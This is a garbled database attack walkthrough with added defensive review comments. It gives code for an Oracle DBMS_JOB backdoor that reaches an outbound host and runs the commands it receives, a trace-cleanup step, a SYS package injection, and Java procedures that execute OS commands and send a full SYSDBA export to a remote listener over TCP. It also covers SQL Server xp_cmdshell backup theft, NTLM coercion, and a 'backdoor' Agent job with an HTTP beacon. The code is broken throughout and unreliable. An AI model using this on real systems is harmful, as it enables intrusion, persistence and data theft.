1oraclebackdoor.sql
2(creates a function named ins_backdoor that executes a user in a transaction)
3
-- Review note (defensive): Oracle persistence mechanism. The function submits
-- a DBMS_JOB whose body opens an outbound UTL_TCP connection to a hard-coded
-- (placeholder) address, reads SQL text from that socket line by line
-- (UTL_TCP.GET_LINE), runs it through DBMS_SQL, and writes the results back
-- over the same socket (UTL_TCP.WRITE_LINE). The SYSDATE arguments passed to
-- DBMS_JOB.SUBMIT re-run the job on a schedule (the page says every 60 s).
-- AUTHID CURRENT_USER plus PRAGMA AUTONOMOUS_TRANSACTION means the COMMIT at
-- the end persists the job independently of the caller's transaction.
-- Detection / hardening:
--   * Inspect DBMS_JOB / JOB$ entries whose WHAT text references UTL_TCP or
--     DBMS_SQL from non-administrative schemas; the cleanup block later in
--     this file searches JOB$ for exactly that text, and the same LIKE
--     predicate works as a hunting query for defenders.
--   * EXECUTE on UTL_TCP should not be granted to PUBLIC, and outbound PL/SQL
--     network access should be restricted with network ACLs
--     (DBMS_NETWORK_ACL_ADMIN) plus egress filtering on the database host.
--   * Audit CREATE FUNCTION/PROCEDURE and DBMS_JOB.SUBMIT, and alert on
--     connections from the database host to unexpected external ports.
-- As pasted, the text contains many transcription errors and does not appear
-- to be directly compilable; read it as a description of the technique.
4CREATE OR REPLACE
5FUNCTION ins_backdoor RETURN VARCHAR2 AUTHID CURRENT_USER AS
6 PRAGMA AUTONOMOUS_TRANSACTION;
7 job_id NUMBER;
8BEGIN
9
10(submits a db functionality within DBMS_JOB over tcp/ip within the backdoor console with UTL_TCP within Oracle packages)
11
-- The second argument to DBMS_JOB.SUBMIT is the entire job body as one string
-- literal; it runs up to the closing quote on the SYSDATE line below. Nothing
-- in it executes when this function is called -- it runs later from the job
-- queue, which is what makes the JOB$ / DBMS_JOB audit trail the place to look.
12DBMS_JOB.SUBMIT(job_id, 'DECLARE l_cn UTRL_TCP>CONNECTIOn;
13l_cn_ret_val PLS_INTEGER;
14l_cn_ret_val_sql1stm BARCHAR2(32000);
15l_cn_thecursor INTEGER;
16l_cn_columnvalue VACHAR2(2000);
17l_status INTEGER;
18l_colcnt NUMBER DEFAULT 0;
19l_desc_t DBMS_SQL.DESC_TAB;
20BEGIN
21
22(opens a connection the the RHOST backdoore console running on port 444 over tcp)l_cn : = UTL_TCP.OPEN_CONNECTION(''192.168.*.*'',
23printf" change this to RHOST 4444,1521!\n!");
24
25(get info at DBMS_SQL over tcp with xmp doc)
26
27SELECT DBID, NAME INTO l_colcnt, l_sql1stm FROM V$DATABASE;
28SELECT banner INTO l_columnvalueFROM V$VERSION WHERE ROWNUM = l;
29_ret_vali := UTL_TCP.WRITE_LINE(1_cn, ''<?xml version="1.0" encoding="utf-8"?><IncomingConn xmlns="http://tempuri.org/IncomingBackdoorConn.xsd"
30DBType="Oracle" ServerVersion="'' || l_cn_columnvalue || '' " DBName="'' || l_sqllstm_sqllstm
31 LOOP
32 l_sqlstm: :UTL.TCP.GET_LINE(l_cn, TRUE);
33 BEGIN
34
35 l_thecursor := DBMS_SQL.OPEN_CURSOR;
36 (if receieved sql command is SELECT first get all column names and send to Backdoor SQL DBID
37 IF(SUBSTR(LTRIM(UPPER(l_sqlstm)), 1, 7)) = ''SELEC''THEN
38
39
40
41
42 DBMS_SQL.PARSE(l_thecursor, l_sqlstm, DBMS_SQL.NATIVE);
43 DBMS_SQL.DESCRIBE_COLUMS(l_thecursor, 1_colcnt, 1_desc_t);
44 FOR i IN l .. l_colcnt LOOP
45 l_ret_val := UTL_TCP.WRITE_LINE(l_cn, '''' || l_desc_t(i).cool_name);
46 END LOOP;
47 l_ret_val := UTL_TCP.WRITE_LINE(l_cn, '''');
48
49 DBMS _SQL.DEFINE_COLUMN(l_thecursor, 1, 1, l_columnvalue, 2000);
50 l_status := DBMS_SQL.EXECUTE(l_thecursor);
51 LOOP
52 EXIT WHEN(DBMS_SQL.FETCH_ROWS(l_thecursor) <= 0);
53 FOR i In l .. l_colcnt
54LOOP
55 DBMS_SQL.COLUMN_VALUE(l_thecursor, i, l_columnvalue);
56 l_retu_valu := UTL_TCP>WRITE_LINE(l_cn, '''' || l_columnvalue);
57 END LOOP;
58
59 DBMS_SQL.CLOSE_CURSOR(l_thecursor);
60 ELSE
61
62 if receieved command is not a SELECT execute asap
63
64 WHEN OTHERS THEN
65 l_return_valu := UTL_TCP.WRITE_LINE(l_cn, ''ORACLE ERROR: '' || sqlerm);
66 END;
67 l_ret_value := UTL_TCP.WRITE_LINE(l_cn, '' [[EnD]]'');
68 END LOOP;
69 UTL_TCP.CLOSE_CONNECTION(1_cn);
70 END;
71 SysDate+10/86400 is the start time for the job (10 seconds after submission)
72 SysDate+ 1/1440 means the job will run every 60 seconds
73
74 ", SYSDATE+ 60/ 10/86400, SYSDATE+ 1/1440');
-- COMMIT is what makes the DBMS_JOB submission take effect; because this is an
-- autonomous transaction it commits even if the calling session rolls back.
75 COMMIT;
76 RETURN;
77END;
78(hiding tracks cleaning backdoor)
79
-- Review note (defensive): anti-forensics step. Scans the SYS-owned JOB$ base
-- table for jobs whose WHAT text begins with the backdoor job body and removes
-- them with DBMS_JOB.REMOVE, committing after each removal.
-- Detection / hardening: reading JOB$ directly normally needs SYS-level
-- privileges, so a non-DBA session touching JOB$ is itself an indicator; audit
-- DBMS_JOB.REMOVE and ship job-queue history off the host so that a removal
-- still leaves a trace. The LIKE predicate below doubles as a hunting query.
80DECLARE
81 CURSOE l_cur_jobs IS
82 SELECT JOB FROM JOB$ WHERE WHAT LIKE 'DECLARE l_cn UTL_TCP.CONNECTION;%';
83 l_rec l_cur_jobs %rowtype;
84
85 BEGIN
86 OPEN l_cur_jobes;
87 LOOP
88 FETCH l_cur_jobs INTO l_rec;
89 EXIT WHEN l_cur_jobs % NOTFOUND;
90 DBMS_JOB.REMOVE(l_rec.job);
91 COMMIT;
92 END LOOP;
93 COMMIT;
94 END;
95
96 getting Administrator on SQL with a low-privilege user
97
-- Review note (defensive): the page presents this block as its low-privilege
-- to administrator step. P_CHANGE_SET is built from a quoted call into the
-- (presumably attacker-owned) L33T schema and handed as an argument to a
-- SYS-owned package; the call on the last line is cut off as pasted.
-- Hardening: keep the database current on Oracle Critical Patch Updates,
-- revoke PUBLIC EXECUTE on SYS packages the application does not need, and
-- audit executions of SYS packages from non-administrative sessions.
98 DECLARE
99 P_CHANGE_SET VARCHAR2 (32767);
100 P_DESCRIPTION VARCHAR2 (32767);
101 P_SUBSCRIPTION_HANDLE NUMBER;
102 BEGIN
103 P_CHANGE_SET: = '''' || L33T.ins_rootkit()||'''';
104 P_DESCRIPTION : = 'AA';
105 P_SUBSCRIPTION_HANDLE := l;
106 SYS.DBMS_CDC_SUBSCRIBE_GET_SUBSCRIPTION_HANDLE(P_CHANGE_SET, P_DESCRIPTION,
107 END;
108
109 submit parameters to DBMS_SQL
110
111 '|| dbms_xmlquery.getXml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate '' ANY PL/SQL BLOCK ''; commit; end; ' , 0)||'
112 (executing PL/SQL in web database)
113
114 SELECT EMPNO, ENAME, JOB FROM L33T.EMP WHERE ENAME LIKE '' | dbms_xmlquery.getXml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute imediate '' ANY PL/SQL BLOCK ''; commit; end ; ',0)||%'
115
116 (sending exploit to vulnerable web application parameter)
117
118 '||SYS.DBMS_METADATA.GET_DDL('AA'' || l33t.ins.backdoor ||''',''||'
119 (using 2 stored procedures in java by oracle to get access to the OS
120
-- Review note (defensive): Java stored procedure source that gives PL/SQL
-- callers OS command execution (Runtime.exec) in the context of the database
-- server's OS account, plus a helper that writes an export parameter file.
-- In Oracle, Runtime.exec and file writes from in-database Java are gated by
-- Java2 permissions granted through DBMS_JAVA.GRANT_PERMISSION; review such
-- grants held by application schemas (DBA_JAVA_POLICY) and audit CREATE JAVA
-- SOURCE DDL outside DBA-owned schemas.
121 CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "SRC_EXECUTEOS" AS
122 import java.lang.*;
123 import java.io.*;
124
125 public class ExecuteOS
126 {
127
128
129 (this java function creates a text file to call the oracle exp DB to contentest a file
130
// Writes an export parameter file. The userid line requests OS
// authentication as SYSDBA, so the exp invocations in the anonymous blocks
// further down would run as a fully privileged user without any password.
131 public static void createParfile ( String parfile, String export) throws
132
133 IOException
134 {
135 File FileOut = new File (parafile);
136 FileWriter fw = new FileWriter (fileOut);
137 fw.write("fully=y\n");
138 fw.write("userid=\"/ as sysdba\"n");
139 fw.write("file=" +export + "\n");
140 fw.close();
141
142 }
143 (java function executes an OS command the string cmd passed as a parameter
// Runs whatever command string the PL/SQL caller passes and waits for it to
// finish; no output is captured and no validation is applied to cmd.
144 public static void execOSCmd (String cmd) throws IOException, java.lang.InterruptedException
145 Process p = Runtime.getRuntime(0 .exec(cmd);
146
147 p.waitFor();
148
149 }
150
151
152};
153
-- Review note (defensive): PL/SQL call specification exposing the Java OS
-- command runner to any database user holding EXECUTE on this procedure.
-- Hunt for call specs declared AS LANGUAGE JAVA in application schemas
-- (DBA_SOURCE) and alert on their creation.
154CREATE OR REPLACE PROCEDURE "PROC_EXECUTEOS" (p_command varchar2)
155AS LANGUAGE JAVA
156NAME 'ExecuteOs.execOsCmd (java.lang.String)';
157
-- Review note (defensive): call specification for the parameter-file writer.
-- The output path is caller-controlled, so this is a file write on the
-- database host in the server process's OS context; treat it like the
-- PROC_EXECUTEOS call spec above when hunting for AS LANGUAGE JAVA objects.
158CREATE OR REPLACE PROCEDURE "PROC_CREATEPARFILE" (p_parfile varchar2, p_export varchar2)
159AS LANGUAGE JAVANAME "ExecuteOS.createParfile (java.lang.String, java.lang.String)';
160(executes the java stored procedures in 2 forms, one for Win32 and one for Linux)
161
162--Windows
163
-- Review note (defensive): Windows variant. Writes the parameter file, runs
-- the exp utility against it (per the parfile above, as OS-authenticated
-- SYSDBA), then zips the dump. A full-database export file appearing under
-- the Oracle software owner's profile or a temp path is the artefact to
-- monitor for; exp/expdp launched by the database server process rather than
-- by an interactive DBA session is itself a strong signal.
164BEGIN
165 PROC_CREATEPARFILE('C:\parfile.txt', 'c:\export.dmp');
166 PROC_EXECUTEOS ('exp parfile=C:\parfile.txt');
167 PROC_EXECUTEOS ('zip c:\export.zip c:\export.dmp');
168END;
169-- Linux
170
-- Review note (defensive): Linux variant of the same sequence (the END of this
-- block is missing as pasted). The relative paths presumably resolve against
-- the database server process's working directory -- confirm on the host.
171BEGIN
172 PROC_CREATEPARFILE('parfile.txt' , 'export.dmp');
173 PROC_EXECUTEOS ('../bin/exp parfile =../parfile.txt');
174 PROC_EXECUTEOS ('/usr/bin/zip export.zip export.dmp');
175
176 send_zip.sql
177 (sets up a tcp listener on a localhost or remote host)
-- Review note (defensive): Java stored procedure used for exfiltration. It
-- reads a local file and streams it over a plain TCP socket to a
-- caller-supplied host and port. Socket access from in-database Java is
-- gated by java.net.SocketPermission grants (DBMS_JAVA.GRANT_PERMISSION);
-- review those grants and alert on outbound connections from the database
-- host to ad-hoc high ports.
178 CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "SRC_FILESEND" AS
179 import java.lang.*;
180 import java.io.*;
181 import java.net.*;
182 public class FileSend
183 {
184
185 (this uses a function to send local file over tcp/ip connection to remote sites
186
// Sends the whole file in 1024-byte chunks over a raw socket; nothing is
// encrypted or authenticated, so the transfer is visible to network
// monitoring and the destination is whatever the caller passes in.
187 public static void fileSend(String myFile, String host, int port) throws Exception
188 {
189 int length;
190 byte buffer[] = new byte[1024];
191
192 File binaryFile = new File(myFile);
193 FileInputStream inpStream = new File.InputStream(myFile);
194 Socket sock = new Socket(host, port);
195 DataOutputStream dos = new DataOutputStream(sock.getOutputStream());
196
197 while ((length ==inpStream.read(buffer)) != -1 {
198 dos.write(buffer, 0, length);
199 dos.flush();
200
201 sock.close();
202 inpStream.close();
203
204 }
205 };
206
-- Review note (defensive): call specification for the exfiltration helper;
-- the same hunting advice applies as for the other AS LANGUAGE JAVA call
-- specs in this file (DBA_SOURCE, creation auditing).
207 CREATE OR REPLACE PROCEDURE "PROC_FILESEND" (myFile varchar2, Hostname2 varchar2, Port PLS_INTEGER)
208 AS LANGUAGE JAVA
209 NAME 'FileSend (java.lang.String, java.lang.String, int)';
210
211 (stealing DB from Internet)
212
-- Review note (defensive): SQL Server variant of the data theft: take a backup
-- to a temp path, compress it with makecab, copy it to a remote UNC share,
-- then delete the local copies. All three OS steps go through xp_cmdshell.
-- Hardening: keep xp_cmdshell disabled (sp_configure 'xp_cmdshell', 0) and
-- alert on it being enabled; watch for BACKUP DATABASE to non-standard paths
-- and for outbound SMB from the SQL host. The copy to a UNC path also makes
-- the SQL Server service account authenticate to the share host (the page's
-- NTLM section below builds on that).
213 backup database.bak to DISK ='c:\windows\temp\out.dat'
214 (compress file so its smaller)
215 use EXEC xp_cmdshell 'makecab c:\windows\temp\out.dat c:\windows\temp\out.cab'
216 get backup.bak cp to local host
217 EXEC xp_cmdshell 'copy c:\windows\temp\out.cab \\your ip\share'
218 deleting file from server
219 EXEC xp_cmdshell 'del c:\windows\temp\out.dat.c:\windows/temp\out.cab'
220
221 (forcing SQL server to authenticate with NTLM privileges)
222
-- Review note (defensive): xp_fileexist against a UNC path makes the SQL
-- Server service account authenticate to the remote share host (the page
-- frames this as forcing NTLM authentication). Mitigations: block outbound
-- SMB (TCP 445) from database hosts, run SQL Server under a low-privilege or
-- managed service account, and enforce SMB signing and Extended Protection
-- for Authentication so a captured exchange cannot be relayed.
223EXEC master.dbo.xp_fileexist '\\IP\share'
224(this will try to connect to SQL server with sysadmin database privs
225
226 NTLM AUTH SCHEMA TABLE:
227
228
229Client connects to Server
230Client (sends challenge) to Server
231Client (sends response) to Server
232Client (authenticates) to Server
233(Hacking SQL Server NTLM)
234client connects to sql server
235client sends challenges to server
236client forces to connect to server
237client sends challenge to client a
238client b sends response to server
239client a sends response to server
240client b authenticates server
241
242(using netcat to dump Date HTTP headers in backdoor rootkit)
-- Review note (defensive): SQL Server Agent persistence. The script that
-- follows creates a job named 'backdoor' with an ActiveScripting (VBScript)
-- step that beacons to an HTTP server and runs database commands through
-- ADODB. Hunting: list msdb.dbo.sysjobs / sysjobsteps for steps with
-- subsystem 'ActiveScripting' or unfamiliar job names, and audit sp_add_job /
-- sp_add_jobstep. The ActiveScripting subsystem is removed from current SQL
-- Server versions, so its presence on a server is itself suspicious.
243BEGIN TRANSACTION
244DECLARE @ReturnCode INT
245SELECT @ReturnCode = 0
246
247IF NOT EXISTS (SELECT name FROM msdb.dbo.syscategories WHERE name =N'[Uncategorized ([Local)]' AND category_class=1)
248BEGIN
249EXEC @ReturnCode = msdb.dbo.sp_add_category @class=N'JOB', @type=N'LOCAL',
250@name =N'[Uncategorized(Local)];
251IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback
252
253END
254DECLARE @jobId BINARY(16)
255(adding backdoor job)
-- Review note (defensive): every @notify_level_* argument is 0, so runs of
-- this job raise no event-log, e-mail, net-send or pager notifications.
-- Detection therefore has to come from job history (msdb.dbo.sysjobhistory)
-- and from auditing the sp_add_job call itself, not from notifications.
256EXEC @ReturnCode = msdb.dbo.sp_add_job @job_name=N'backdoor',
257 @enabled=1,
258 @notify_level_eventlog=0,
259 @notify_level_email=0,
260 @notify_level netsend=0,
261 @notify_level_page=0,
262 @delete_level=0,
263 @description=N'No description available.',
264 @category_name=N", @job_id @jobId OUTPUT
265 IF (@@error <> 0 or @ReturnCode <> 0) GOTO QuitWithRollback
266 (scheduling job for when we want to run/execute it)
-- Review note (defensive): schedule arguments for the job; the procedure call
-- they belong to is absent as pasted, so this fragment is not executable on
-- its own. Scheduled jobs show up in msdb.dbo.sysjobschedules, which is worth
-- including in any Agent-job review.
267 @enabled=1,
268 @freq_type=4,
269 @freq_subday_type=1,
270 @freq_subday_type=1,
271 @freq_relative_interval=0,
272 @freq_recurrence_factor=1,
273 @active_start_date=0, --( job will run in yyyymmdd format)
274 @active_end_date=999991231,
275 @active_start_time=95400 -- (job will run hhmmss format)
276 @active_end_time=235959
277
278 (adding job step with vbscript)
279
-- Review note (defensive): job step with @subsystem ActiveScripting. The
-- @command literal is VBScript that loops, issues HTTP HEAD requests to the
-- configured server on port 80, and runs commands through ADODB, returning
-- recordset contents. Outbound HTTP from the SQL Server Agent service
-- account to an unexpected host is the network observable; on the server,
-- a job step whose command text contains CreateObject / ADODB is the
-- content observable.
280 EXEC @ReturnCode = msdb.dbo.sp_add_jobstep @job_id=@jobId, @step_name=N'1',
281 @step_id=1,
282 @cmdexec_success_code=0,
283 @on_success_action=1,
284 @on_success_step_id=0,
285 @on_fail_action=2,
286 @on_fail_step_id=0,
287 @retry_attempts=0,
288 @retry interval=0,
289 @os_run_priority=0, @subsystem=N'ActiveScripting',
290 @command=N'port =80
291 httpserver = "$RHOST" bypassing IDS SQL
292 command =""
293 on error resume next
294 set rds = createobject("rds.dataspace") XMLHTTP
295 set http = rds.CreateObject("Msxml2.XMLHTTP","")
296
297 if not CheckError then
298 do while ucase(trim(command))<>"EXIT"
299 http.open "HEAD", httpserver & ":" &port, FALSE
300 http.send outtext & vbcrlf = outttext =""
301
302 if not CheckError then
303 if ucase(trim(command))<>"EXIT" then
304 Set Conn = CreateObject("ADODB.Connection"
305 Set Rec = CreateObject("ADODB.Recordset")
306
307 if not CheckEror then
308 for i=0 to rec.fileds.count -1
309 outtext = outtext & rec.fields.itme(i).name
310 next
311
312 outtext = outtext & vbcrlf & rec.getstring(,,vbtab,vbcrlf,"")
313
314 if CheckError then outtext = err.description
315 else
316 outtext = err.description
317 end if
318 end if
319 end if
320 loop
321end if
322
323set conn=nothing
324set rec=nothing
325set http=nothing
326set test=nothing
327
328function CheckError
329 if err=0 then
330 CheckError=False
331 else
332 CheckError=True
333 err=0
334 end if
335 end function
336 '
337 '@database_name=N'VBscript',@flags=0
-- Review note (defensive): the job is bound to the local server and then
-- started immediately with sp_start_job rather than waiting for its schedule.
-- An immediate start right after creation is recorded in
-- msdb.dbo.sysjobactivity / sysjobhistory and is a good correlation point
-- for alerting on newly created jobs.
338 IF(@@ERROR <> 0 OR @ReturnCode <> 0 ) GOTO QuitWithRollback
339 EXEC @ReturnCode = msdb.dbo.sp_update_job @job_id = @jobId, @start_step_id= 1
340 EXEC @ReturnCode =msdb.dbo.sp_add_jobserver @job_id = @jobId, @server_name = N'(local)'
341 IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback
342 COMMIT TRANSACTIONGOTO EndSave
343 QuitWithRollback:
344 IF (@@TRANSCOUNT > 0 ) ROLLBACK TRANSACTION
345 EndSave:
346 (running saved backdoor)
347 EXEC msdb>dbo.sp_start_job @job_name =N'backdoor'
360 *exporting java stored .zip fileSend over tcp port 4445
361
-- Review note (defensive): pushes the zipped export to a hard-coded
-- (placeholder) address on TCP 4445 through the PROC_FILESEND call spec.
-- A database host opening an outbound connection to an ad-hoc high port is
-- the signal to alert on; egress filtering from database subnets blocks it.
362 --Windows
363 exec PROC_FILESEND ('c:\export.zip', '192.168.*.*', 4445);
364
365 -- Linux
366 exec PROC_FILESEND ('./dbs/export/zip', '192.168.*.*, 4445);
367
368
369 (listening on port 4445 via SQL DB server tcp port)
370
# Review note (defensive): the receiving end is a plain netcat listener that
# writes the incoming stream to a file; nothing in the transfer is
# authenticated or encrypted, so the session is fully visible to network
# capture and the listener itself is a simple thing to spot on the far host.
371 nc -p 4445 -l > oracle-db.zip